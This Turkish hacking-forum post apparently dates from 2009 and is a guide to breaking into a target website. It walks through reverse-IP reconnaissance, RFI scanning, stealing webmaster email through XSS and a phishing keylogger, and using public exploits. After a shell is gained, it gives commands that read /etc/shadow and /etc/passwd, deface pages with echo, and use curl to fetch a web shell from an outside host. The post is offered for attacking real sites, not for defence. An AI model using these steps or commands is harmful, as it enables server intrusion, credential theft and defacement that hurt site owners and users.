By.BiCi Admin
Rep Gücü : 401 Rep Puanı : 10
| Konu: Hedef Site Nasıl Hacklenir , Neler Yapmalı , Hangi Yollar İzlenmeli | Resimli Perş. Mart 05, 2009 10:24 pm | |
| İlk Once Hedef Siteye İliskin Bilgileri Alabilicegimiz Siteleri Yazalım :
http://whois.sc/hedefsite.com - Bu Siteden Hedef Domainin Makine İp,Ns,Domainin Alınıs ve Bitis Tarihlerini Gorebilirsiniz.Ornek: Megaturks.net http://whois.webhosting.info/hedefsite.com - Bu Sitemizden'de Hedef Sitemiz İp'si İle Aynı Serverda Bulunan Sitelerin Listesini Alabiliriz.Tabi bu Verdigim İki Adres Dısında İki Tane Daha İsinize Yarayacak Yer Var.http://www.e-dns.org Son Olarak Bu Sitemizden Bahsediyim Sitede İlk Anasayfada Domain Whois yani Ns,ip,email vb.. Bilgileri Verir Reserve İp Kısmına Tıklarsanız.Sitenin Baglı Oldugunu makine yani serverdaki Siteleri Listeler Diger Verdigim Sitelere Nazaran Bu Sitemiz Daha Kapsamlı Olabilir ama Yinede Diger Siteleride Kosullara Gore Kullanınız
Neler Yapmalı ?1) Bilgilerimizi Elde Ettikten Sonra Sıte Lıstemizle İslem Yapalım Oncelikle İsterseniz Tüm Listeyi Rfi Tarayıcı Programlara Atıp Acık Listenizle Taratma Yaptırabilirsiniz.Bu İslevi Goren Programlar Piyasada Mevcut.2) İsterseniz Serverdaki Sitelerin Kendi Whoislerine Bakıp Domain Mailini Ele Gecirip Host Sifrelerine Ulasabilrisiniz.Bunun icin Yontemler;Snifferla Xss Yontemi Yahoo - Gmail - Linuxmail - Hackermail -Superonline ve Mynet Hesaplarında Xss Acıgı Mevcut Bazıları Paylasılmadı ama Zamanla Megaturks'te Vericem.Veya Sitede Paylasımını Yaptım HTML Keylogger Yapımı Sizi Sonuca Ulastırabilir Hedefin Mailine Atıp Tıklattırıp Tüm Sifrelerine Ulasabilirsiniz.3)Site Listesindeki Siteleri tek tek Yada Scriptlerinde Acık Olabilicegine İnandıklarınızı milw0rm Securitydot.net gibi Sitelerden Guncel Acıklarına Bakıp Suncuya Girme Yollarına Gidebilirsiniz.Xss Sql RFİ Tarzı Acıklarla..Hedefe GirisWindows Yapılı SunucularSunucuya Girdiginizi Varsayarsak Windows Yapılı Sunucularda Safe Mode: ON İse Kullanmanızı Tavsıye Edecegım Zehir Veya Benzeri Shellerdir.Dizin Gecmiyorsa Yapacagınız En Mantıklı Sey Program Files Kısmına İnmek Olur Burada Herhangi Bir Ftp Programı Kurulumu İnceleyiniz.Bilmeyen Arkadaslara Yazıyorum Windows Sunuculara Shelle Girdiginizde Yapıları Xp İle Aynıdır.Kurulu Ftp Programı varsa Emin Olun Ftp Logları Bi Yerde Vardır.Baska izleyeceginiz Yol İse SudurRESİM 1 :Resim 2 :http://pic1.resimupload.com/r3/thumb_449027247.jpgWindows Sunucularda Guvenligi Asmanın Yolları Kısıtlıdır Ama Zamanla Onlarıda Paylasırız.Lınux Kadar Bypass ve Root Olunması Kolay Degıldır.Linux Yapılı SunucularLinux Sistemi Php İcin Cok İyi Olmasına Karsın ve Saldırılara karsı Daha Cok Korumaları Olmasına Ragmen Shelle Girildiginde En Cok Darbe Yiyen Sunucular Linuxlerdir.Kullanabiliceginiz Basit Komutlar;cat /etc/shadow - Sunucudaki Site Sifreleri Saklıdır %90 Perm Vardırcat /etc/passwd - Sunucudaki Kullanıcıları Listeler/var/named - Sunucudaki Siteleri Listeler/var/cpanel - Cpanel Loglarını Verir/var/mail - Sunucudaki Kullanıcıları Listeler/tmp - Linuxte yazma İzni En Cok Bulunan Klasor/etc/vdomainaliases - Hem Kullanıcıları Hemde Site Adreslerini Listelerecho Hacked By GHOST turkhackgrup.com >/home/sıte/public_html - Echo Komutu Sunucuda Hızlı Bir sekilde Bazı perm li Dosyalara Bile Uyarınızı Basmaya Yararcurl -o shell.php http://www.site.com/shell.txt - Bazı Sunucularda Klasorlere Normal Upload Yokken Bu Komutumuzla Shell İmizi cekebiliriz.Safe Mode: ON ve Disable Functionlarla Fonksiyonları Durdurulmus ve Engellemis Linuxlerde Safe Mode : ON Bypass ın nasıl yapıldığını hem bazı konulardada anlattıközellikle shell kullanmayı bilmiyosanız bu konudan önce sitede açmış olduğum Professıonal RFI adlı konuda bir RFI uzmanı olabilirsiniz İyi Hackler ... | |
|